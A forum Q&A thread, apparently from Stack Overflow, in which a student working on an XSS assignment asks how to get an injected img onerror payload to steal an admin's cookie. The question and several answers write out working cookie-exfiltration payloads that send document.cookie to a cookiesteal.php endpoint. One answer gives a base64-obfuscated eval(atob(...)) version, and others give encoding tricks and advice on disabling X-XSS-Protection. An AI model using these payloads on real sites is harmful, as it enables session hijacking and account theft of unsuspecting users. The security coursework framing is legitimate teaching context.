# How to append var to var.src without using +

Tags: javascript, html, dom, xss, onerror

Im trying to do an XSS attack for an assignment, injecting some code, however the server is set up to strip most HTML tags, but I am able to inject using `img` tag and onerror. When injecting, I can't seem to get the syntax right as it takes away my "+" in my string append (trying to attach cookie to the source I'm using).

```
<img src="img.gif" 
     onerror="var img = document.createElement('img'); img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;">
```

When i check this after injection (in inspect element) it shows the script, but the plus symbol at the end is missing. is there another way to append this cookie to the img.src without using the +?

UPDATE:

I got the plus in there and now the Event Listener has activated. But ive tried using onerror, onload, onmouseover and nothing is activating the code, im not receiving the admin cookie.

Answer (score 1):

Try using using %2B instead of +

https://www.w3schools.com/tags/ref_urlencode.asp

Comment: That worked getting the plus, but now apparently i have an error :\

Comment: onerror function doesnt like it apparently, im not sure why

Answer (score 0):

Try this on error

```
eval(atob('dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2ltZycpOwoJIGltZy5zcmM9J2h0dHA6Ly9sb2NhbGhvc3QvY29va2llc3RlYWwucGhwP2Nvb2tpZT0nKyBkb2N1bWVudC5jb29raWU7'))
```

what I have done,

1. Take the code as a string and convert to base64 `btoa()`
2. eval can execute a sting as a code, but we need to decode it first atob dose that 
   hence `eval(atob('encoded code'));`

the encoded code

```
`var img = document.createElement('img');
     img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;`
```

So your end it should look like

```
<img src="img.gif" onerror="eval(atob('dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2ltZycpOwoJIGltZy5zcmM9J2h0dHA6Ly9sb2NhbGhvc3QvY29va2llc3RlYWwucGhwP2Nvb2tpZT0nKyBkb2N1bWVudC5jb29raWU7'))">
```

Comment: onerror is still freaking out from this. i dont understand why, is the syntax wrong? When i inspect element in firefox to see the injected code, it has been injected but its flagged with "ev" (Event Listener), when i click it it shows me "error" along with the onerror function and the injected code.

Comment: Did you see the expanded code or the encrypted one?

Answer (score 0):

Use [encodeURIComponent](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/encodeURIComponent)

```
<img src="img.gif" onerror="var img = document.createElement('img'); img.src=encodeURIComponent('http://localhost/cookiesteal.php?cookie='+ document.cookie);">
```

Answer (score 0):

It should work fine if you properly encode the injected script.

The only error you may get is if XSS protection is On.
You can disable it by sending the response header

> ("X-XSS-Protection", 0)

What does your console report as an error?

Comment: The event listener is working, so im assuming that means i have the right syntax. I tried onerror, onload, onmouseover, nothing is activating the script and sending me the admin session id cookie

Comment: Check the response headers to see the X-XSS-Protection flag. Which browser are you using to test with?
Double check that onerror is invoked by adding a console.log statement.

Comment: you should also check using the console that in document.cookie  the cookie you want is present